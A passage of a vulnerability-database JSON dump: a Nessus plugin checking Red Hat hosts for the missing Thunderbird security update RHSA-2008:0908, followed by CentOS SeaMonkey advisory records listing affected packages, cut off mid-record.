\"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4070\");\n script_xref(name:\"RHSA\", value:\"2008:0908\");\n\n script_name(english:\"RHEL 4 / 5 : thunderbird (RHSA-2008:0908)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated thunderbird packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail\ncontent. An HTML mail message containing malicious content could cause\nThunderbird to crash or, potentially, execute arbitrary code as the\nuser running Thunderbird. (CVE-2008-0016, CVE-2008-4058,\nCVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed HTML mail content was\ndisplayed. An HTML mail message containing specially crafted content\ncould potentially trick a Thunderbird user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068)\n\nA flaw was found in Thunderbird that caused certain characters to be\nstripped from JavaScript code. This flaw could allow malicious\nJavaScript to bypass or evade script filters. (CVE-2008-4065,\nCVE-2008-4066)\n\nNote: JavaScript support is disabled by default in Thunderbird; the\nabove issue is not exploitable unless JavaScript is enabled.\n\nA heap based buffer overflow flaw was found in the handling of\ncancelled newsgroup messages. If the user cancels a specially crafted\nnewsgroup message it could cause Thunderbird to crash or, potentially,\nexecute arbitrary code as the user running Thunderbird.\n(CVE-2008-4070)\n\nAll Thunderbird users should upgrade to these updated packages, which\nresolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-0016.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-3835.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4058.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4059.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4060.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4061.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4062.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4065.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4066.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4067.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4068.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4070.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2008-0908.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 189, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0908\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"thunderbird-1.5.0.12-16.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"thunderbird-2.0.0.17-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"thunderbird-2.0.0.17-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:49", "references": ["https://rhn.redhat.com/errata/rh21as-errata.html", "http://www.ict.swin.edu.au/staff/jnewbigin"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2.c2.1", "arch": "i386", "packageName": "seamonkey-nss", "packageFilename": "seamonkey-nss-1.0.9-0.20.el2.c2.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2.c2.1", "arch": "i386", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.20.el2.c2.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2.c2.1", "arch": "i386", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-0.20.el2.c2.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2.c2.1", "arch": "i386", "packageName": "seamonkey-nspr-devel", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.20.el2.c2.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2.c2.1", "arch": "i386", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-0.20.el2.c2.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2.c2.1", "arch": "i386", "packageName": "seamonkey-nss-devel", "packageFilename": "seamonkey-nss-devel-1.0.9-0.20.el2.c2.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2.c2.1", "arch": "i386", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.20.el2.c2.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2.c2.1", "arch": "i386", "packageName": "seamonkey-nspr", "packageFilename": "seamonkey-nspr-1.0.9-0.20.el2.c2.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2.c2.1", "arch": "i386", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-0.20.el2.c2.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2.c2.1", "arch": "i386", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-0.20.el2.c2.1.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2008:0882-01\n\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\nCVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was displayed. A\nweb page containing specially crafted content could potentially trick a\nSeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\nCVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A web page\ncontaining specially crafted JavaScript code could move the content window\nwhile a mouse-button was pressed, causing any item under the pointer to be\ndragged. This could, potentially, cause the user to perform an unsafe\ndrag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be stripped\nfrom JavaScript code. This flaw could allow malicious JavaScript to bypass\nor evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nAll SeaMonkey users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015270.html\n\n**Affected packages:**\nseamonkey\nseamonkey-chat\nseamonkey-devel\nseamonkey-dom-inspector\nseamonkey-js-debugger\nseamonkey-mail\nseamonkey-nspr\nseamonkey-nspr-devel\nseamonkey-nss\nseamonkey-nss-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 1, "reporter": "CentOS Project", "published": "2008-09-24T23:08:13", "title": "seamonkey security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-09-24T23:08:13", "href": "http://lists.centos.org/pipermail/centos-announce/2008-September/015270.html", "id": "CESA-2008:0882-01", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:43", "references": ["https://rhn.redhat.com/errata/RHSA-2008-0882.html", "http://pasi.pirhonen.eu/", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "ia64", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.centos3.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390x", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.centos3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.centos.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "i386", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-26.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390x", "packageName": "seamonkey-nspr", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.centos3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-26.el4.centos.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390x", "packageName": "seamonkey-nss-devel", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.centos3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "x86_64", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.24.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "ia64", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-26.el4.centos.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.centos3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-nss", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-26.el4.centos.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390", "packageName": "seamonkey-nspr", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.centos3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390x", "packageName": "seamonkey-nss", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.centos3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "i386", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-26.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390", "packageName": "seamonkey-nss-devel", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.centos3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "ia64", "packageName": "seamonkey-nspr-devel", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.centos3.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "ia64", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-26.el4.centos.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-26.el4.centos.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "any", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-26.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "any", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-26.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "ia64", "packageName": "seamonkey-nspr", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.centos3.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-nspr-devel", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "ia64", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-26.el4.centos.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "ia64", "packageName": "seamonkey-nss-devel", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.centos3.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390", "packageName": "seamonkey-nspr-devel", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.centos3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "x86_64", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "i386", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-26.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.centos3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "x86_64", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-nss", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-nss", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390x", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-26.el4.centos.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-nss-devel", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "ia64", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.centos.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "x86_64", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-26.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-nspr", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-nspr", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "i386", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "any", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.24.el3.centos3.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "any", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.24.el3.centos3.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "ia64", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.centos.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.centos3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390x", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.centos3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "ia64", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.24.el3.centos3.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "x86_64", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-26.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390x", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.centos3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.centos3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390x", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.centos.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "ia64", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.centos3.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "i386", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.centos.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.24.el3.centos3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "ia64", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.centos3.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390x", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.centos.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390x", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-0.24.el3.centos3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-nss-devel", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390x", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.centos3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "x86_64", "packageName": "seamonkey-nspr", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.centos3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": 